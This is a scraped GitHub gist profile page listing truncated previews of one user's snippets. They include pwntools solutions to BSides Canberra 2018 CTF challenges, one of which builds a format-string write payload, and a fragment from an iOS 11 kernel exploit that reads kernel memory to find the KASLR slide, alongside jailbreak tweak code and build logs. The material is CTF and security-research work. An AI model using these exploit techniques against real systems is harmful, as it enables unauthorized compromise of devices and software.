Skip to content

Instantly share code, notes, and snippets.

George Dan ninjaprawn

Block or report user

Report or block ninjaprawn

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
ninjaprawn /
Created Jul 17, 2018
Solution to Neo Boffy from the BSides Canberra CTF 2018
from pwn import *
bin_path = "./neo_boffy"
# Don't want pwntools writing to the console every time we spawn a binary, since we are spawning a lot of binaries
# Can't send NULLs, but can send empty strings
def cmdify(str): return str.split("\x00")
ninjaprawn / dsc_changes
Created Jun 4, 2018
Changes in the iOS 12 dsc
View dsc_changes
- /System/Library/AccessibilityBundles/AXActionSheetUIServer.axuiservice/AXActionSheetUIServer
- /System/Library/Frameworks/AuthenticationServices.framework/AuthenticationServices
- /System/Library/Frameworks/CarPlay.framework/CarPlay
- /System/Library/Frameworks/CoreServices.framework/CoreServices
- /System/Library/Frameworks/CoreTelephony.framework/Support/libSystemDetermination.dylib
- /System/Library/Frameworks/GLKit.framework/GLKit
- /System/Library/Frameworks/IdentityLookupUI.framework/IdentityLookupUI
- /System/Library/Frameworks/MetalPerformanceShaders.framework/Frameworks/MPSRayIntersector.framework/MPSRayIntersector
- /System/Library/Frameworks/NaturalLanguage.framework/NaturalLanguage
ninjaprawn /
Created May 31, 2018
Solution to Fat Morphine from the BSides Canberra CTF 2018
from pwn import *
bin_path = "./fat_morphine"
payload = ""
payload += "%4196134x" # What we are writing
payload += "%{}$lln" # How we write it
payload += "\x30\x0d\x60" # Where we write it
payload = payload.format(10)
ninjaprawn / slide.c
Last active Dec 12, 2017
async_wake_ios slide calculator - based of Siguza's v0rtex method of calculating the slide
View slide.c
Offsets from iOS 11.1.2 iPhone 6+
Insert the following after line 680 in async_wait.c
Mostly from Siguza's v0rtex
mach_ports_register(mach_task_self(), &user_client, 1);
uint64_t IOSurfaceRootUserClient_port = rk64(task_addr + 0x2e8 + 0x8); // 0x2e8 = OFFSET_TASK_ITK_REGISTERED, second port in the list
uint64_t IOSurfaceRootUserClient_addr = rk64(IOSurfaceRootUserClient_port + koffset(KSTRUCT_OFFSET_IPC_PORT_IP_KOBJECT));
uint64_t IOSurfaceRootUserClient_vtab = rk64(IOSurfaceRootUserClient_addr);
View installing theos
brew install dpkg ldid
cd ~
git clone --recursive
echo "export THEOS=~/theos" >> .bash_profile
View limitless301016.log
Showing All Messages
Build target Limitless of project Limitless with configuration Debug
PhaseScriptExecution Symlinks\ Setup /Users/ninja/Library/Developer/Xcode/DerivedData/Limitless-ffaafdspyfyrqgberifhaiobmnbg/Build/Intermediates/
cd /Volumes/Files/Developer/Limitless
export ACTION=build
export ALTERNATE_GROUP=staff
View wtf.xm
@property (strong, nonatomic) NSString *currentPhoneNumber;
-(NSMutableArray*)getHiddenNumbers {
NSArray *hiddenNumbers = [[NSUserDefaults standardUserDefaults] objectForKey:@"hiddenNumbers"];
if (hiddenNumbers == nil) {
return [[NSMutableArray alloc] init];
return [NSMutableArray arrayWithArray:hiddenNumbers];
ninjaprawn / privateclassaccessability
Created Dec 24, 2015
List of private classes/functions that can be accessed magically
View privateclassaccessability
SBUIController - NO (Protected by FrontBoard)
SBIconController - NO (Protected by FrontBoard)
SBPowerDownController - YES (assertion failure in -[SBPowerDownController _screen])
SBWallpaperController - NO (Protected by FrontBoard)
SpringBoard (actual app) - YES (Not sure how to fetch, Only one UIApp can be active at one time)
ninjaprawn / record.xm
Created Oct 24, 2015
random attempt to record screen
View record.xm
%hook BSPlatform
- (BOOL)isInternalInstall {
return YES;
ninjaprawn / tweak.xm
Last active Aug 10, 2016
it was greeny D:
View tweak.xm
@interface SBApplicationController
-(id)applicationWithBundleIdentifier:(id)arg1 ;
@interface SBApplication
@interface SBApplicationIcon : NSObject
-(id)initWithApplication:(id)arg1 ;
You can’t perform that action at this time.